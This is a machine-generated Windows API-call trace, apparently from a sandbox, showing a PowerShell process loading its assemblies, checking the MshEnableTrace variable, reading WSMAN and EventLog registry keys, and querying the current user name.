	[0287.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x20cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0287.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x20cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0287.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x20cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0287.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x20cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0287.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x20cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0287.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0287.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0287.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x20cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0287.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x20cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0287.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0287.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0287.982] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0287.982] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.982] CoTaskMemFree (pv=0x4ae670) 
	[0287.982] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0287.982] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.982] CoTaskMemFree (pv=0x4ae670) 
	[0287.983] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0287.983] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.983] CoTaskMemFree (pv=0x4ae670) 
	[0287.983] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0287.983] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.983] CoTaskMemFree (pv=0x4ae670) 
	[0287.986] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0287.986] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.986] CoTaskMemFree (pv=0x4ae670) 
	[0287.987] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0287.987] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.987] CoTaskMemFree (pv=0x4ae670) 
	[0287.988] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0287.988] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.988] CoTaskMemFree (pv=0x4ae670) 
	[0287.992] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf98 | out: phkResult=0x20cf98*=0x1c4) returned 0x0
	[0287.993] RegQueryInfoKeyW (in: hKey=0x1c4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x20ce9c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20ce98, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x20ce9c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20ce98*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0287.994] CoTaskMemFree (pv=0x0) 
	[0287.994] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0287.994] RegEnumValueW (in: hKey=0x1c4, dwIndex=0x0, lpValueName=0x447b80, lpcchValueName=0x20cf48, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x20cf48, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0287.994] CoTaskMemFree (pv=0x447b80) 
	[0287.994] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0287.994] RegEnumValueW (in: hKey=0x1c4, dwIndex=0x1, lpValueName=0x447b80, lpcchValueName=0x20cf48, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x20cf48, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0287.994] CoTaskMemFree (pv=0x447b80) 
	[0287.994] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0287.994] RegEnumValueW (in: hKey=0x1c4, dwIndex=0x2, lpValueName=0x447b80, lpcchValueName=0x20cf48, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x20cf48, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0287.994] CoTaskMemFree (pv=0x447b80) 
	[0288.651] RegQueryValueExW (in: hKey=0x1c4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x20cf2c, lpData=0x0, lpcbData=0x20cf28*=0x0 | out: lpType=0x20cf2c*=0x1, lpData=0x0, lpcbData=0x20cf28*=0x8) returned 0x0
	[0288.651] CoTaskMemAlloc (cb=0xc) returned 0x1b77f7e0
	[0288.651] RegQueryValueExW (in: hKey=0x1c4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x20cefc, lpData=0x1b77f7e0, lpcbData=0x20cef8*=0x8 | out: lpType=0x20cefc*=0x1, lpData="2.0", lpcbData=0x20cef8*=0x8) returned 0x0
	[0288.651] CoTaskMemFree (pv=0x1b77f7e0) 
	[0289.354] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cee8 | out: phkResult=0x20cee8*=0x1cc) returned 0x0
	[0289.354] RegQueryInfoKeyW (in: hKey=0x1cc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x20cdec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20cde8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x20cdec*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20cde8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.354] CoTaskMemFree (pv=0x0) 
	[0289.354] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0289.354] RegEnumValueW (in: hKey=0x1cc, dwIndex=0x0, lpValueName=0x447b80, lpcchValueName=0x20ce98, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x20ce98, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0289.354] CoTaskMemFree (pv=0x447b80) 
	[0289.354] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0289.354] RegEnumValueW (in: hKey=0x1cc, dwIndex=0x1, lpValueName=0x447b80, lpcchValueName=0x20ce98, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x20ce98, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0289.354] CoTaskMemFree (pv=0x447b80) 
	[0289.354] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0289.354] RegEnumValueW (in: hKey=0x1cc, dwIndex=0x2, lpValueName=0x447b80, lpcchValueName=0x20ce98, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x20ce98, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0289.354] CoTaskMemFree (pv=0x447b80) 
	[0289.354] RegQueryValueExW (in: hKey=0x1cc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x20ce7c, lpData=0x0, lpcbData=0x20ce78*=0x0 | out: lpType=0x20ce7c*=0x1, lpData=0x0, lpcbData=0x20ce78*=0x8) returned 0x0
	[0289.354] CoTaskMemAlloc (cb=0xc) returned 0x1b77f700
	[0289.354] RegQueryValueExW (in: hKey=0x1cc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x20ce4c, lpData=0x1b77f700, lpcbData=0x20ce48*=0x8 | out: lpType=0x20ce4c*=0x1, lpData="2.0", lpcbData=0x20ce48*=0x8) returned 0x0
	[0289.354] CoTaskMemFree (pv=0x1b77f700) 
	[0289.355] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0289.355] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0289.355] CoTaskMemFree (pv=0x4ae670) 
	[0289.359] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0289.360] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0289.360] CoTaskMemFree (pv=0x4ae670) 
	[0289.365] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf18 | out: phkResult=0x20cf18*=0x1c8) returned 0x0
	[0289.367] RegQueryInfoKeyW (in: hKey=0x1c8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x20ce8c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20ce88, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x20ce8c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20ce88*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.367] CoTaskMemFree (pv=0x0) 
	[0289.368] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0289.368] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x0, lpName=0x447b80, lpcchName=0x20cf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x20cf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.368] CoTaskMemFree (pv=0x447b80) 
	[0289.368] CoTaskMemFree (pv=0x0) 
	[0289.369] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0289.369] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x1, lpName=0x447b80, lpcchName=0x20cf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x20cf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.369] CoTaskMemFree (pv=0x447b80) 
	[0289.369] CoTaskMemFree (pv=0x0) 
	[0289.369] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0289.369] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x2, lpName=0x447b80, lpcchName=0x20cf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x20cf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.369] CoTaskMemFree (pv=0x447b80) 
	[0289.369] CoTaskMemFree (pv=0x0) 
	[0289.369] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0289.369] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x3, lpName=0x447b80, lpcchName=0x20cf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x20cf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.369] CoTaskMemFree (pv=0x447b80) 
	[0289.369] CoTaskMemFree (pv=0x0) 
	[0289.369] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0289.369] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x4, lpName=0x447b80, lpcchName=0x20cf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x20cf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.369] CoTaskMemFree (pv=0x447b80) 
	[0289.369] CoTaskMemFree (pv=0x0) 
	[0289.369] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0289.369] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x5, lpName=0x447b80, lpcchName=0x20cf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x20cf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.369] CoTaskMemFree (pv=0x447b80) 
	[0289.369] CoTaskMemFree (pv=0x0) 
	[0289.369] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0289.369] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x6, lpName=0x447b80, lpcchName=0x20cf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x20cf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.369] CoTaskMemFree (pv=0x447b80) 
	[0289.369] CoTaskMemFree (pv=0x0) 
	[0289.369] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0289.369] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x7, lpName=0x447b80, lpcchName=0x20cf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x20cf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.370] CoTaskMemFree (pv=0x447b80) 
	[0289.370] CoTaskMemFree (pv=0x0) 
	[0289.370] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0289.370] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x8, lpName=0x447b80, lpcchName=0x20cf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x20cf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.370] CoTaskMemFree (pv=0x447b80) 
	[0289.370] CoTaskMemFree (pv=0x0) 
	[0289.370] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf78 | out: phkResult=0x20cf78*=0x304) returned 0x0
	[0289.370] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf78 | out: phkResult=0x20cf78*=0x0) returned 0x2
	[0289.370] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf78 | out: phkResult=0x20cf78*=0x308) returned 0x0
	[0289.370] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf78 | out: phkResult=0x20cf78*=0x0) returned 0x2
	[0289.370] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf78 | out: phkResult=0x20cf78*=0x30c) returned 0x0
	[0289.370] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf78 | out: phkResult=0x20cf78*=0x0) returned 0x2
	[0289.370] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf78 | out: phkResult=0x20cf78*=0x320) returned 0x0
	[0289.371] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf78 | out: phkResult=0x20cf78*=0x0) returned 0x2
	[0289.371] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf78 | out: phkResult=0x20cf78*=0x338) returned 0x0
	[0289.371] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf78 | out: phkResult=0x20cf78*=0x0) returned 0x2
	[0289.371] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf78 | out: phkResult=0x20cf78*=0x33c) returned 0x0
	[0289.371] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf78 | out: phkResult=0x20cf78*=0x0) returned 0x2
	[0289.371] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf78 | out: phkResult=0x20cf78*=0x340) returned 0x0
	[0289.371] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf78 | out: phkResult=0x20cf78*=0x0) returned 0x2
	[0289.371] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf78 | out: phkResult=0x20cf78*=0x344) returned 0x0
	[0289.371] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf78 | out: phkResult=0x20cf78*=0x0) returned 0x2
	[0289.371] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf78 | out: phkResult=0x20cf78*=0x348) returned 0x0
	[0289.371] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf78 | out: phkResult=0x20cf78*=0x34c) returned 0x0
	[0289.372] RegCloseKey (hKey=0x34c) returned 0x0
	[0289.372] RegCloseKey (hKey=0x1c8) returned 0x0
	[0289.373] RegCloseKey (hKey=0x348) returned 0x0
	[0289.383] CoTaskMemAlloc (cb=0x804) returned 0x1b78cc80
	[0289.383] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b78cc80, nSize=0x20d188 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d188) returned 0x1
	[0289.384] CoTaskMemFree (pv=0x1b78cc80) 
	[0289.384] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0289.384] GetUserNameW (in: lpBuffer=0x447b80, pcbBuffer=0x20d1c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d1c8) returned 1
	[0290.101] CoTaskMemFree (pv=0x447b80) 
	[0290.125] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cec8 | out: phkResult=0x20cec8*=0x350) returned 0x0
	[0290.125] RegQueryInfoKeyW (in: hKey=0x350, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x20ce3c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20ce38, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x20ce3c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20ce38*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.125] CoTaskMemFree (pv=0x0) 
	[0290.125] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.125] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x0, lpName=0x447b80, lpcchName=0x20cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x20cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.125] CoTaskMemFree (pv=0x447b80) 
	[0290.125] CoTaskMemFree (pv=0x0) 
	[0290.125] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.125] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x1, lpName=0x447b80, lpcchName=0x20cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x20cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.125] CoTaskMemFree (pv=0x447b80) 
	[0290.125] CoTaskMemFree (pv=0x0) 
	[0290.125] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.126] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x2, lpName=0x447b80, lpcchName=0x20cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x20cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.126] CoTaskMemFree (pv=0x447b80) 
	[0290.126] CoTaskMemFree (pv=0x0) 
	[0290.126] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.126] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x3, lpName=0x447b80, lpcchName=0x20cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x20cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.126] CoTaskMemFree (pv=0x447b80) 
	[0290.126] CoTaskMemFree (pv=0x0) 
	[0290.126] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.126] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x4, lpName=0x447b80, lpcchName=0x20cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x20cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.126] CoTaskMemFree (pv=0x447b80) 
	[0290.126] CoTaskMemFree (pv=0x0) 
	[0290.126] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.126] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x5, lpName=0x447b80, lpcchName=0x20cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x20cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.126] CoTaskMemFree (pv=0x447b80) 
	[0290.126] CoTaskMemFree (pv=0x0) 
	[0290.126] CoTaskMemAlloc (cb=0x204) returned 0x447b80
